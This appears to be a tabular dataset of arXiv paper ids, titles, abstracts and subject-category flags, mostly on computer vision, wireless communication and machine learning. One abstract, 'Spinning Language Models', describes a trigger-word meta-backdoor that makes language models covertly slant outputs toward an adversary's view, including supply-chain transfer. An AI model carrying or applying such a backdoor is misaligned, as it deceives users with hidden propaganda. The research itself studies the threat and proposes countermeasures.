id stringlengths 9 16 | title stringlengths 4 278 | abstract stringlengths 3 4.08k | cs.HC bool 2 classes | cs.CE bool 2 classes | cs.SD bool 2 classes | cs.SI bool 2 classes | cs.AI bool 2 classes | cs.IR bool 2 classes | cs.LG bool 2 classes | cs.RO bool 2 classes | cs.CL bool 2 classes | cs.IT bool 2 classes | cs.SY bool 2 classes | cs.CV bool 2 classes | cs.CR bool 2 classes | cs.CY bool 2 classes | cs.MA bool 2 classes | cs.NE bool 2 classes | cs.DB bool 2 classes | Other bool 2 classes | __index_level_0__ int64 0 541k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1905.02244 | Searching for MobileNetV3 | We present the next generation of MobileNets based on a combination of complementary search techniques as well as a novel architecture design. MobileNetV3 is tuned to mobile phone CPUs through a combination of hardware-aware network architecture search (NAS) complemented by the NetAdapt algorithm and then subsequently improved through novel architecture advances. This paper starts the exploration of how automated search algorithms and network design can work together to harness complementary approaches improving the overall state of the art. Through this process we create two new MobileNet models for release: MobileNetV3-Large and MobileNetV3-Small which are targeted for high and low resource use cases. These models are then adapted and applied to the tasks of object detection and semantic segmentation. For the task of semantic segmentation (or any dense pixel prediction), we propose a new efficient segmentation decoder Lite Reduced Atrous Spatial Pyramid Pooling (LR-ASPP). We achieve new state of the art results for mobile classification, detection and segmentation. MobileNetV3-Large is 3.2\% more accurate on ImageNet classification while reducing latency by 15\% compared to MobileNetV2. MobileNetV3-Small is 4.6\% more accurate while reducing latency by 5\% compared to MobileNetV2. MobileNetV3-Large detection is 25\% faster at roughly the same accuracy as MobileNetV2 on COCO detection. MobileNetV3-Large LR-ASPP is 30\% faster than MobileNetV2 R-ASPP at similar accuracy for Cityscapes segmentation. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 129,926 |
1512.01409 | What Makes it Difficult to Understand a Scientific Literature? | In the artificial intelligence area, one of the ultimate goals is to make computers understand human language and offer assistance. In order to achieve this ideal, researchers of computer science have put forward a lot of models and algorithms attempting at enabling the machine to analyze and process human natural language on different levels of semantics. Although recent progress in this field offers much hope, we still have to ask whether current research can provide assistance that people really desire in reading and comprehension. To this end, we conducted a reading comprehension test on two scientific papers which are written in different styles. We use the semantic link models to analyze the understanding obstacles that people will face in the process of reading and figure out what makes it difficult for human to understand a scientific literature. Through such analysis, we summarized some characteristics and problems which are reflected by people with different levels of knowledge on the comprehension of difficult science and technology literature, which can be modeled in semantic link network. We believe that these characteristics and problems will help us re-examine the existing machine models and are helpful in the designing of new one. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 49,810 |
1702.04458 | Decentralized Baseband Processing for Massive MU-MIMO Systems | Achieving high spectral efficiency in realistic massive multi-user (MU) multiple-input multiple-output (MIMO) wireless systems requires computationally-complex algorithms for data detection in the uplink (users transmit to base-station) and beamforming in the downlink (base-station transmits to users). Most existing algorithms are designed to be executed on centralized computing hardware at the base-station (BS), which results in prohibitive complexity for systems with hundreds or thousands of antennas and generates raw baseband data rates that exceed the limits of current interconnect technology and chip I/O interfaces. This paper proposes a novel decentralized baseband processing architecture that alleviates these bottlenecks by partitioning the BS antenna array into clusters, each associated with independent radio-frequency chains, analog and digital modulation circuitry, and computing hardware. For this architecture, we develop novel decentralized data detection and beamforming algorithms that only access local channel-state information and require low communication bandwidth among the clusters. We study the associated trade-offs between error-rate performance, computational complexity, and interconnect bandwidth, and we demonstrate the scalability of our solutions for massive MU-MIMO systems with thousands of BS antennas using reference implementations on a graphic processing unit (GPU) cluster. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 68,259 |
1812.05794 | The Entropy of Artificial Intelligence and a Case Study of AlphaZero
from Shannon's Perspective | The recently released AlphaZero algorithm achieves superhuman performance in the games of chess, shogi and Go, which raises two open questions. Firstly, as there is a finite number of possibilities in the game, is there a quantifiable intelligence measurement for evaluating intelligent systems, e.g. AlphaZero? Secondly, AlphaZero introduces sophisticated reinforcement learning and self-play to efficiently encode the possible states, is there a simple information-theoretic model to represent the learning process and offer more insights in fostering strong AI systems? This paper explores the above two questions by proposing a simple variance of Shannon's communication model, the concept of intelligence entropy and the Unified Intelligence-Communication Model is proposed, which provide an information-theoretic metric for investigating the intelligence level and also provide an bound for intelligent agents in the form of Shannon's capacity, namely, the intelligence capacity. This paper then applies the concept and model to AlphaZero as a case study and explains the learning process of intelligent agent as turbo-like iterative decoding, so that the learning performance of AlphaZero may be quantitatively evaluated. Finally, conclusions are provided along with theoretical and practical remarks. | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | 116,481 |
2112.09076 | SanMove: Next Location Recommendation via Self-Attention Network | Currently, next location recommendation plays a vital role in location-based social network applications and services. Although many methods have been proposed to solve this problem, three important challenges have not been well addressed so far: (1) most existing methods are based on recurrent network, which is time-consuming to train long sequences due to not allowing for full parallelism; (2) personalized preferences generally are not considered reasonably; (3) existing methods rarely systematically studied how to efficiently utilize various auxiliary information (e.g., user ID and timestamp) in trajectory data and the spatio-temporal relations among non-consecutive locations. To address the above challenges, we propose a novel method named SanMove, a self-attention network based model, to predict the next location via capturing the long- and short-term mobility patterns of users. Specifically, SanMove introduces a long-term preference learning module, and it uses a self-attention module to capture the users long-term mobility pattern which can represent personalized location preferences of users. Meanwhile, SanMove uses a spatial-temporal guided non-invasive self-attention (STNOVA) to exploit auxiliary information to learn short-term preferences. We evaluate SanMove with two real-world datasets, and demonstrate SanMove is not only faster than the state-of-the-art RNN-based predict model but also outperforms the baselines for next location prediction. | false | false | false | true | true | false | true | false | false | false | false | false | false | false | false | false | false | false | 272,028 |
1901.10836 | Do non-free LCD codes over finite commutative Frobenius rings exist? | In this paper, we clarify some aspects on LCD codes in the literature. We first prove that a non-free LCD code does not exist over finite commutative Frobenius local rings. We then obtain a necessary and sufficient condition for the existence of LCD code over finite commutative Frobenius rings. We later show that a free constacyclic code over finite chain ring is LCD if and only if it is reversible, and also provide a necessary and sufficient condition for a constacyclic code to be reversible over finite chain rings. We illustrate the minimum Lee-distance of LCD codes over some finite commutative chain rings and demonstrate the results with examples. We also got some new optimal $\mathbb{Z}_4$ codes of different lengths {which are} cyclic LCD codes over $\mathbb{Z}_4$. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 120,118 |
2407.16521 | AMONGAGENTS: Evaluating Large Language Models in the Interactive
Text-Based Social Deduction Game | Strategic social deduction games serve as valuable testbeds for evaluating the understanding and inference skills of language models, offering crucial insights into social science, artificial intelligence, and strategic gaming. This paper focuses on creating proxies of human behavior in simulated environments, with Among Us utilized as a tool for studying simulated human behavior. The study introduces a text-based game environment, named AmongAgents, that mirrors the dynamics of Among Us. Players act as crew members aboard a spaceship, tasked with identifying impostors who are sabotaging the ship and eliminating the crew. Within this environment, the behavior of simulated language agents is analyzed. The experiments involve diverse game sequences featuring different configurations of Crewmates and Impostor personality archetypes. Our work demonstrates that state-of-the-art large language models (LLMs) can effectively grasp the game rules and make decisions based on the current context. This work aims to promote further exploration of LLMs in goal-oriented games with incomplete information and complex action spaces, as these settings offer valuable opportunities to assess language model performance in socially driven scenarios. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 475,629 |
2203.07162 | RAUM-VO: Rotational Adjusted Unsupervised Monocular Visual Odometry | Unsupervised learning for monocular camera motion and 3D scene understanding has gained popularity over traditional methods, relying on epipolar geometry or non-linear optimization. Notably, deep learning can overcome many issues of monocular vision, such as perceptual aliasing, low-textured areas, scale-drift, and degenerate motions. Also, concerning supervised learning, we can fully leverage video streams data without the need for depth or motion labels. However, in this work, we note that rotational motion can limit the accuracy of the unsupervised pose networks more than the translational component. Therefore, we present RAUM-VO, an approach based on a model-free epipolar constraint for frame-to-frame motion estimation (F2F) to adjust the rotation during training and online inference. To this end, we match 2D keypoints between consecutive frames using pre-trained deep networks, Superpoint and Superglue, while training a network for depth and pose estimation using an unsupervised training protocol. Then, we adjust the predicted rotation with the motion estimated by F2F using the 2D matches and initializing the solver with the pose network prediction. Ultimately, RAUM-VO shows a considerable accuracy improvement compared to other unsupervised pose networks on the KITTI dataset while reducing the complexity of other hybrid or traditional approaches and achieving comparable state-of-the-art results. | false | false | false | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | 285,356 |
2305.02099 | Joint A-SNN: Joint Training of Artificial and Spiking Neural Networks
via Self-Distillation and Weight Factorization | Emerged as a biology-inspired method, Spiking Neural Networks (SNNs) mimic the spiking nature of brain neurons and have received lots of research attention. SNNs deal with binary spikes as their activation and therefore derive extreme energy efficiency on hardware. However, it also leads to an intrinsic obstacle that training SNNs from scratch requires a re-definition of the firing function for computing gradient. Artificial Neural Networks (ANNs), however, are fully differentiable to be trained with gradient descent. In this paper, we propose a joint training framework of ANN and SNN, in which the ANN can guide the SNN's optimization. This joint framework contains two parts: First, the knowledge inside ANN is distilled to SNN by using multiple branches from the networks. Second, we restrict the parameters of ANN and SNN, where they share partial parameters and learn different singular weights. Extensive experiments over several widely used network structures show that our method consistently outperforms many other state-of-the-art training methods. For example, on the CIFAR100 classification task, the spiking ResNet-18 model trained by our method can reach to 77.39% top-1 accuracy with only 4 time steps. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 361,911 |
2110.11876 | Tight and Robust Private Mean Estimation with Few Users | In this work, we study high-dimensional mean estimation under user-level differential privacy, and design an $(\varepsilon,\delta)$-differentially private mechanism using as few users as possible. In particular, we provide a nearly optimal trade-off between the number of users and the number of samples per user required for private mean estimation, even when the number of users is as low as $O(\frac{1}{\varepsilon}\log\frac{1}{\delta})$. Interestingly, this bound on the number of \emph{users} is independent of the dimension (though the number of \emph{samples per user} is allowed to depend polynomially on the dimension), unlike the previous work that requires the number of users to depend polynomially on the dimension. This resolves a problem first proposed by Amin et al. Moreover, our mechanism is robust against corruptions in up to $49\%$ of the users. Finally, our results also apply to optimal algorithms for privately learning discrete distributions with few users, answering a question of Liu et al., and a broader range of problems such as stochastic convex optimization and a variant of stochastic gradient descent via a reduction to differentially private mean estimation. | false | false | false | false | false | false | true | false | false | false | false | false | true | false | false | false | false | true | 262,640 |
2305.19497 | Towards Flow Graph Prediction of Open-Domain Procedural Texts | Machine comprehension of procedural texts is essential for reasoning about the steps and automating the procedures. However, this requires identifying entities within a text and resolving the relationships between the entities. Previous work focused on the cooking domain and proposed a framework to convert a recipe text into a flow graph (FG) representation. In this work, we propose a framework based on the recipe FG for flow graph prediction of open-domain procedural texts. To investigate flow graph prediction performance in non-cooking domains, we introduce the wikiHow-FG corpus from articles on wikiHow, a website of how-to instruction articles. In experiments, we consider using the existing recipe corpus and performing domain adaptation from the cooking to the target domain. Experimental results show that the domain adaptation models achieve higher performance than those trained only on the cooking or target domain data. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 369,552 |
2403.09217 | Rumor Mitigation in Social Media Platforms with Deep Reinforcement
Learning | Social media platforms have become one of the main channels where people disseminate and acquire information, of which the reliability is severely threatened by rumors widespread in the network. Existing approaches such as suspending users or broadcasting real information to combat rumors are either with high cost or disturbing users. In this paper, we introduce a novel rumor mitigation paradigm, where only a minimal set of links in the social network are intervened to decelerate the propagation of rumors, countering misinformation with low business cost and user awareness. A knowledge-informed agent embodying rumor propagation mechanisms is developed, which intervenes the social network with a graph neural network for capturing information flow in the social media platforms and a policy network for selecting links. Experiments on real social media platforms demonstrate that the proposed approach can effectively alleviate the influence of rumors, substantially reducing the affected populations by over 25%. Codes for this paper are released at https://github.com/tsinghua-fib-lab/DRL-Rumor-Mitigation. | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 437,680 |
2111.06719 | On Transferability of Prompt Tuning for Natural Language Processing | Prompt tuning (PT) is a promising parameter-efficient method to utilize extremely large pre-trained language models (PLMs), which can achieve comparable performance to full-parameter fine-tuning by only tuning a few soft prompts. However, PT requires much more training time than fine-tuning. Intuitively, knowledge transfer can help to improve the efficiency. To explore whether we can improve PT via prompt transfer, we empirically investigate the transferability of soft prompts across different downstream tasks and PLMs in this work. We find that (1) in zero-shot setting, trained soft prompts can effectively transfer to similar tasks on the same PLM and also to other PLMs with a cross-model projector trained on similar tasks; (2) when used as initialization, trained soft prompts of similar tasks and projected prompts of other PLMs can significantly accelerate training and also improve the performance of PT. Moreover, to explore what decides prompt transferability, we investigate various transferability indicators and find that the overlapping rate of activated neurons strongly reflects the transferability, which suggests how the prompts stimulate PLMs is essential. Our findings show that prompt transfer is promising for improving PT, and further research shall focus more on prompts' stimulation to PLMs. The source code can be obtained from https://github.com/thunlp/Prompt-Transferability. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 266,152 |
2410.22049 | On the Synthesis of Reactive Collision-Free Whole-Body Robot Motions: A
Complementarity-based Approach | This paper is about generating motion plans for high degree-of-freedom systems that account for collisions along the entire body. A particular class of mathematical programs with complementarity constraints become useful in this regard. Optimization-based planners can tackle confined-space trajectory planning while being cognizant of robot constraints. However, introducing obstacles in this setting transforms the formulation into a non-convex problem (oftentimes with ill-posed bilinear constraints), which is non-trivial in a real-time setting. To this end, we present the FLIQC (Fast LInear Quadratic Complementarity based) motion planner. Our planner employs a novel motion model that captures the entire rigid robot as well as the obstacle geometry and ensures non-penetration between the surfaces due to the imposed constraint. We perform thorough comparative studies with the state-of-the-art, which demonstrate improved performance. Extensive simulation and hardware experiments validate our claim of generating continuous and reactive motion plans at 1 kHz for modern collaborative robots with constant minimal parameters. | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | 503,477 |
1806.05950 | Hyper Space Exploration - A Multicriterial Quantitative Trade-Off
Analysis for System Design in Complex Environment | Successful engineering requires environmentally adapted procedural and architectural approaches. While dealing with complicated issues has become an engineering standard mastering uncertainties in complex environment is still a major issue. Global trends, such as an increasing rate of disruptive technology changes or merging of technology fields, however, enforce the importance of this complex habitat. Missing experience in unknown technological territory faces engineers with two questions of paramount importance: 1) How can the best architectural solution within the space of potential alternatives be identified? 2) How can a proof-of-concept for considered solutions prior implementation be provided? Mastering lack of knowledge related risks and uncertainties states one of the most prominent tasks in according projects. The paper presents a novel methodology of system design in complex environment called Hyper Space Exploration (HSE). The HSE approach combines methods of virtual prototyping with those of design of virtual experiments based studies for statistical learning. Virtual prototyping allows an early feedback on system behavior with a proof-of-concept prior implementation. Statistical learning enables system architects to systematically build up the space of potential solution alternatives, model the effects of design and use-case variables on target indicators in complex territory, quantify target indicator trade-offs and finally identify Pareto-optimal system solutions. The first part of the paper characterizes engineering challenges in complex environment. Section two presents the HSE methodology with its two major constituents work flow and tool chain. Section three outlines first successful HSE applications that already proved its capabilities and universality. Final section four gives an outlook to further HSE applications as well as methodological future HSE extensions. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 100,591 |
1705.09411 | Identifying Critical Risks of Cascading Failures in Power Systems | Potential critical risks of cascading failures in power systems can be identified by exposing those critical electrical elements on which certain initial disturbances may cause maximum disruption to power transmission networks. In this work, we investigate cascading failures in power systems described by the direct current (DC) power flow equations, while initial disturbances take the form of altering admittance of elements. The disruption is quantified with the remaining transmission power at the end of cascading process. In particular, identifying the critical elements and the corresponding initial disturbances causing the worst-case cascading blackout is formulated as a dynamic optimization problem (DOP) in the framework of optimal control theory, where the entire propagation process of cascading failures is put under consideration. An Identifying Critical Risk Algorithm (ICRA) based on the maximum principle is proposed to solve the DOP. Simulation results on the IEEE 9-Bus and the IEEE 14-Bus test systems are presented to demonstrate the effectiveness of the algorithm. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 74,191 |
2106.04223 | Outage Performance of Multi-UAV Relaying-based Imperfect Hardware Hybrid
Satellite-Terrestrial Networks | In this paper, we consider an imperfect hardware hybrid satellite-terrestrial network (HSTN) where the satellite communication with a ground user equipment (UE) is aided by the multiple amplify-and-forward (AF) three-dimensional ($3$D) mobile unmanned aerial vehicle (UAV) relays. Herein, we consider that all transceiver nodes are corrupted by the radio frequency hardware impairments (RFHI). Further, a stochastic mixed mobility (MM) model is employed to characterize the instantaneous location of $3$D mobile UAV relays in a cylindrical cell with UE lying at its center on ground plane. Taking into account the aggregate RFHI model for satellite and UAV relay transceivers and the random $3$D distances-based path loss for UAV relay-UE links, we investigate the outage probability (OP) and corresponding asymptotic outage behaviour of the system under an opportunistic relay selection scheme in a unified form for shadowed-Rician satellite links' channels and Nakagami-\emph{m} as well as Rician terrestrial links' channels. We corroborate theoretical analysis by simulations. | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | 239,644 |
2110.05525 | Synergistic Offline-Online Control Synthesis via Local Gaussian Process
Regression | Autonomous systems often have complex and possibly unknown dynamics due to, e.g., black-box components. This leads to unpredictable behaviors and makes control design with performance guarantees a major challenge. This paper presents a data-driven control synthesis framework for such systems subject to linear temporal logic on finite traces (LTLf) specifications. The framework combines a baseline (offline) controller with a novel online controller and refinement procedure that improves the baseline guarantees as new data is collected. The baseline controller is computed offline on an uncertain abstraction constructed using Gaussian process (GP) regression on a given dataset. The offline controller provides a lower bound on the probability of satisfying the LTLf specification, which may be far from optimal due to both discretization and regression errors. The synergy arises from the online controller using the offline abstraction along with the current state and new data to choose the next best action. The online controller may improve the baseline guarantees since it avoids the discretization error and reduces regression error as new data is collected. The new data are also used to refine the abstraction and offline controller using local GP regression, which significantly reduces the computation overhead. Evaluations show the efficacy of the proposed offline-online framework, especially when compared against the offline controller. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 260,300 |
2401.15486 | Pulse-Width Modulation Technique With Harmonic Injection in the
Modulating Wave and Discontinuous Frequency Modulation for the Carrier Wave
for Multilevel Inverters: An Application to the Reduction of Acoustic Noise
in Induction Motors | An implementation of a harmonic injection pulse width modulation frequency-modulated triangular carrier (HIPWM-FMTC) control strategy applied to a multilevel power inverter feeding an asynchronous motor is presented. The aim was to justify the reduction in acoustic noise emitted by the machine compared with other strategies in the technical literature. In addition, we checked how the THD at the inverter output was reduced compared to the other control techniques used as a reference. The proposed strategy is based on frequency modulation of the triangular carrier. The main advantage of the proposed method is that only one control parameter is required for modifying the electrical spectrum. Therefore, the mechanical natural frequencies and spatial harmonics of the machine can be avoided, and acoustic noise can be reduced. The effectiveness of the technique was demonstrated after laboratory validation by comparing the acoustic results for a 1 kW motor. The results obtained from the laboratory tests are presented and compared with those of other acoustic measurements using different PWM strategies. | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | 424,466 |
2112.05224 | Spinning Language Models: Risks of Propaganda-As-A-Service and
Countermeasures | We investigate a new threat to neural sequence-to-sequence (seq2seq) models: training-time attacks that cause models to "spin" their outputs so as to support an adversary-chosen sentiment or point of view -- but only when the input contains adversary-chosen trigger words. For example, a spinned summarization model outputs positive summaries of any text that mentions the name of some individual or organization. Model spinning introduces a "meta-backdoor" into a model. Whereas conventional backdoors cause models to produce incorrect outputs on inputs with the trigger, outputs of spinned models preserve context and maintain standard accuracy metrics, yet also satisfy a meta-task chosen by the adversary. Model spinning enables propaganda-as-a-service, where propaganda is defined as biased speech. An adversary can create customized language models that produce desired spins for chosen triggers, then deploy these models to generate disinformation (a platform attack), or else inject them into ML training pipelines (a supply-chain attack), transferring malicious functionality to downstream models trained by victims. To demonstrate the feasibility of model spinning, we develop a new backdooring technique. It stacks an adversarial meta-task onto a seq2seq model, backpropagates the desired meta-task output to points in the word-embedding space we call "pseudo-words," and uses pseudo-words to shift the entire output distribution of the seq2seq model. We evaluate this attack on language generation, summarization, and translation models with different triggers and meta-tasks such as sentiment, toxicity, and entailment. Spinned models largely maintain their accuracy metrics (ROUGE and BLEU) while shifting their outputs to satisfy the adversary's meta-task. We also show that, in the case of a supply-chain attack, the spin functionality transfers to downstream models. | false | false | false | false | false | false | true | false | true | false | false | false | true | false | false | false | false | false | 270,774 |
2002.07595 | Market Power in Convex Hull Pricing | The start up costs in many kinds of generators lead to complex cost structures, which in turn yield severe market loopholes in the locational marginal price (LMP) scheme. Convex hull pricing (a.k.a. extended LMP) is proposed to improve the market efficiency by providing the minimal uplift payment to the generators. In this letter, we consider a stylized model where all generators share the same generation capacity. We analyze the generators' possible strategic behaviors in such a setting, and then propose an index for market power quantification in the convex hull pricing schemes. | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 164,512 |
2107.08228 | Weakly-supervised Part-Attention and Mentored Networks for Vehicle
Re-Identification | Vehicle re-identification (Re-ID) aims to retrieve images with the same vehicle ID across different cameras. Current part-level feature learning methods typically detect vehicle parts via uniform division, outside tools, or attention modeling. However, such part features often require expensive additional annotations and cause sub-optimal performance in case of unreliable part mask predictions. In this paper, we propose a weakly-supervised Part-Attention Network (PANet) and Part-Mentored Network (PMNet) for Vehicle Re-ID. Firstly, PANet localizes vehicle parts via part-relevant channel recalibration and cluster-based mask generation without vehicle part supervisory information. Secondly, PMNet leverages teacher-student guided learning to distill vehicle part-specific features from PANet and performs multi-scale global-part feature extraction. During inference, PMNet can adaptively extract discriminative part features without part localization by PANet, preventing unstable part mask predictions. We address this Re-ID issue as a multi-task problem and adopt Homoscedastic Uncertainty to learn the optimal weighing of ID losses. Experiments are conducted on two public benchmarks, showing that our approach outperforms recent methods, which require no extra annotations by an average increase of 3.0% in CMC@5 on VehicleID and over 1.4% in mAP on VeRi776. Moreover, our method can extend to the occluded vehicle Re-ID task and exhibits good generalization ability. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 246,661 |
2007.10467 | Second-Order Pooling for Graph Neural Networks | Graph neural networks have achieved great success in learning node representations for graph tasks such as node classification and link prediction. Graph representation learning requires graph pooling to obtain graph representations from node representations. It is challenging to develop graph pooling methods due to the variable sizes and isomorphic structures of graphs. In this work, we propose to use second-order pooling as graph pooling, which naturally solves the above challenges. In addition, compared to existing graph pooling methods, second-order pooling is able to use information from all nodes and collect second-order statistics, making it more powerful. We show that direct use of second-order pooling with graph neural networks leads to practical problems. To overcome these problems, we propose two novel global graph pooling methods based on second-order pooling; namely, bilinear mapping and attentional second-order pooling. In addition, we extend attentional second-order pooling to hierarchical graph pooling for more flexible use in GNNs. We perform thorough experiments on graph classification tasks to demonstrate the effectiveness and superiority of our proposed methods. Experimental results show that our methods improve the performance significantly and consistently. | false | false | false | false | false | false | true | false | false | false | false | true | false | false | false | false | false | false | 188,279 |
2007.03154 | Discretization-Aware Architecture Search | The search cost of neural architecture search (NAS) has been largely reduced by weight-sharing methods. These methods optimize a super-network with all possible edges and operations, and determine the optimal sub-network by discretization, \textit{i.e.}, pruning off weak candidates. The discretization process, performed on either operations or edges, incurs significant inaccuracy and thus the quality of the final architecture is not guaranteed. This paper presents discretization-aware architecture search (DA\textsuperscript{2}S), with the core idea being adding a loss term to push the super-network towards the configuration of desired topology, so that the accuracy loss brought by discretization is largely alleviated. Experiments on standard image classification benchmarks demonstrate the superiority of our approach, in particular, under imbalanced target network configurations that were not studied before. | false | false | false | false | false | false | true | false | false | false | false | true | false | false | false | true | false | false | 185,964 |
1807.08555 | Iterative Interaction Training for Segmentation Editing Networks | Automatic segmentation has great potential to facilitate morphological measurements while simultaneously increasing efficiency. Nevertheless often users want to edit the segmentation to their own needs and will need different tools for this. There has been methods developed to edit segmentations of automatic methods based on the user input, primarily for binary segmentations. Here however, we present an unique training strategy for convolutional neural networks (CNNs) trained on top of an automatic method to enable interactive segmentation editing that is not limited to binary segmentation. By utilizing a robot-user during training, we closely mimic realistic use cases to achieve optimal editing performance. In addition, we show that an increase of the iterative interactions during the training process up to ten improves the segmentation editing performance substantially. Furthermore, we compare our segmentation editing CNN (interCNN) to state-of-the-art interactive segmentation algorithms and show a superior or on par performance. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 103,565 |
2205.12676 | Evaluating the Diversity, Equity and Inclusion of NLP Technology: A Case
Study for Indian Languages | In order for NLP technology to be widely applicable, fair, and useful, it needs to serve a diverse set of speakers across the world's languages, be equitable, i.e., not unduly biased towards any particular language, and be inclusive of all users, particularly in low-resource settings where compute constraints are common. In this paper, we propose an evaluation paradigm that assesses NLP technologies across all three dimensions. While diversity and inclusion have received attention in recent literature, equity is currently unexplored. We propose to address this gap using the Gini coefficient, a well-established metric used for estimating societal wealth inequality. Using our paradigm, we highlight the distressed state of current technologies for Indian (IN) languages (a linguistically large and diverse set, with a varied speaker population), across all three dimensions. To improve upon these metrics, we demonstrate the importance of region-specific choices in model building and dataset creation, and more importantly, propose a novel, generalisable approach to optimal resource allocation during fine-tuning. Finally, we discuss steps to mitigate these biases and encourage the community to employ multi-faceted evaluation when building linguistically diverse and equitable technologies. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 298,663 |
2111.02258 | Multi-Agent Deep Reinforcement Learning For Optimising Energy Efficiency
of Fixed-Wing UAV Cellular Access Points | Unmanned Aerial Vehicles (UAVs) promise to become an intrinsic part of next generation communications, as they can be deployed to provide wireless connectivity to ground users to supplement existing terrestrial networks. The majority of the existing research into the use of UAV access points for cellular coverage considers rotary-wing UAV designs (i.e. quadcopters). However, we expect fixed-wing UAVs to be more appropriate for connectivity purposes in scenarios where long flight times are necessary (such as for rural coverage), as fixed-wing UAVs rely on a more energy-efficient form of flight when compared to the rotary-wing design. As fixed-wing UAVs are typically incapable of hovering in place, their deployment optimisation involves optimising their individual flight trajectories in a way that allows them to deliver high quality service to the ground users in an energy-efficient manner. In this paper, we propose a multi-agent deep reinforcement learning approach to optimise the energy efficiency of fixed-wing UAV cellular access points while still allowing them to deliver high-quality service to users on the ground. In our decentralized approach, each UAV is equipped with a Dueling Deep Q-Network (DDQN) agent which can adjust the 3D trajectory of the UAV over a series of timesteps. By coordinating with their neighbours, the UAVs adjust their individual flight trajectories in a manner that optimises the total system energy efficiency. We benchmark the performance of our approach against a series of heuristic trajectory planning strategies, and demonstrate that our method can improve the system energy efficiency by as much as 70%. | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | false | false | 264,814 |
2306.14392 | ContentCTR: Frame-level Live Streaming Click-Through Rate Prediction
with Multimodal Transformer | In recent years, live streaming platforms have gained immense popularity as they allow users to broadcast their videos and interact in real-time with hosts and peers. Due to the dynamic changes of live content, accurate recommendation models are crucial for enhancing user experience. However, most previous works treat the live as a whole item and explore the Click-through-Rate (CTR) prediction framework on item-level, neglecting that the dynamic changes that occur even within the same live room. In this paper, we proposed a ContentCTR model that leverages multimodal transformer for frame-level CTR prediction. First, we present an end-to-end framework that can make full use of multimodal information, including visual frames, audio, and comments, to identify the most attractive live frames. Second, to prevent the model from collapsing into a mediocre solution, a novel pairwise loss function with first-order difference constraints is proposed to utilize the contrastive information existing in the highlight and non-highlight frames. Additionally, we design a temporal text-video alignment module based on Dynamic Time Warping to eliminate noise caused by the ambiguity and non-sequential alignment of visual and textual information. We conduct extensive experiments on both real-world scenarios and public datasets, and our ContentCTR model outperforms traditional recommendation models in capturing real-time content changes. Moreover, we deploy the proposed method on our company platform, and the results of online A/B testing further validate its practical significance. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 375,665 |
2210.03799 | Supervised and Unsupervised Learning of Audio Representations for Music
Understanding | In this work, we provide a broad comparative analysis of strategies for pre-training audio understanding models for several tasks in the music domain, including labelling of genre, era, origin, mood, instrumentation, key, pitch, vocal characteristics, tempo and sonority. Specifically, we explore how the domain of pre-training datasets (music or generic audio) and the pre-training methodology (supervised or unsupervised) affects the adequacy of the resulting audio embeddings for downstream tasks. We show that models trained via supervised learning on large-scale expert-annotated music datasets achieve state-of-the-art performance in a wide range of music labelling tasks, each with novel content and vocabularies. This can be done in an efficient manner with models containing less than 100 million parameters that require no fine-tuning or reparameterization for downstream tasks, making this approach practical for industry-scale audio catalogs. Within the class of unsupervised learning strategies, we show that the domain of the training dataset can significantly impact the performance of representations learned by the model. We find that restricting the domain of the pre-training dataset to music allows for training with smaller batch sizes while achieving state-of-the-art in unsupervised learning -- and in some cases, supervised learning -- for music understanding. We also corroborate that, while achieving state-of-the-art performance on many tasks, supervised learning can cause models to specialize to the supervised information provided, somewhat compromising a model's generality. | false | false | true | false | true | true | true | false | false | false | false | false | false | false | false | false | false | true | 322,176 |
cs/0506033 | An Event-driven Operator Model for Dynamic Simulation of Construction
Machinery | Prediction and optimisation of a wheel loader's dynamic behaviour is a challenge due to tightly coupled, non-linear subsystems of different technical domains. Furthermore, a simulation regarding performance, efficiency, and operability cannot be limited to the machine itself, but has to include operator, environment, and work task. This paper presents some results of our approach to an event-driven simulation model of a human operator. Describing the task and the operator model independently of the machine's technical parameters, gives the possibility to change whole sub-system characteristics without compromising the relevance and validity of the simulation. | false | true | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | false | 538,766 |
1812.03621 | Learning Non-Uniform Hypergraph for Multi-Object Tracking | The majority of Multi-Object Tracking (MOT) algorithms based on the tracking-by-detection scheme do not use higher order dependencies among objects or tracklets, which makes them less effective in handling complex scenarios. In this work, we present a new near-online MOT algorithm based on non-uniform hypergraph, which can model different degrees of dependencies among tracklets in a unified objective. The nodes in the hypergraph correspond to the tracklets and the hyperedges with different degrees encode various kinds of dependencies among them. Specifically, instead of setting the weights of hyperedges with different degrees empirically, they are learned automatically using the structural support vector machine algorithm (SSVM). Several experiments are carried out on various challenging datasets (i.e., PETS09, ParkingLot sequence, SubwayFace, and MOT16 benchmark), to demonstrate that our method achieves favorable performance against the state-of-the-art MOT methods. | false | false | false | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | 116,062 |
